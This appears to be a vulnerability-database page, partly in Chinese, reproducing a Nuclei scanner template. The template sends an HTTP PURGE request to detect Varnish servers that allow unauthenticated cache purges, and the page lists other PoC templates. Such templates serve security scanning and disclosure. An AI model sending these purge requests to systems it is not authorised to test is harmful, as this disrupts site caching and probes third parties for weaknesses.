unauthenticated-varnish-cache-purge: Varnish Unauthenticated Cache Purge

漏洞描述

PoC代码[已公开]

id: unauthenticated-varnish-cache-purge

info:
  name: Varnish Unauthenticated Cache Purge
  author: 0xelkomy
  severity: low
  description: As per guideline one should protect purges with ACLs from unauthorized hosts.
  reference:
    - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
    - https://hackerone.com/reports/154278
  metadata:
    max-request: 1
  tags: misconfig,cache,hackerone,varnish,vuln

http:
  - method: PURGE
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>200 Purged</title>'
          - '"status": "ok"'
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402202c385aa7bd9654ccf7f6100d4c3435a5a2a0e48bc16aab10e7695b97737a9fff0220722c2fdccef3442f161a2c883ebc18b63510d39b627db45c7d78258b4a759aa6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC wp-sg-cachepress-fpd: WordPress Plugin SG Optimizer - Full Path Disclosure
• POC wp-super-cache-fpd: WordPress WP Super Cache - Full Path Disclosure
• POC wp-w3-total-cache-fpd: WordPress W3 Total Cache - Full Path Disclosure
• POC CVE-2024-24882: Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation
• POC grafana-unauth-access: Grafana Unauthenticated Access
• POC CVE-2022-27924: Zimbra Collaboration Suite - Memcached Command Injection
• POC CVE-2024-2862: LG LED Assistant - Unauthenticated Password Reset
• POC wp-w3-total-cache-exposure: WordPress W3 Total Cache - Cache Files Exposure
• POC jboss-jmx-console-unauth: JBoss JMX Console - Unauthenticated Access
• POC wp-better-wp-security-login-disclosure: WordPress Solid Security < 9.0.1 - Unauthenticated Login Page Disclosure
• POC wp-sg-cachepress-fpd: WordPress Plugin SG Optimizer - Full Path Disclosure
• POC wp-super-cache-fpd: WordPress WP Super Cache - Full Path Disclosure
• SohuTV CacheCloud 跨站脚本漏洞 (CVE-2025-15221)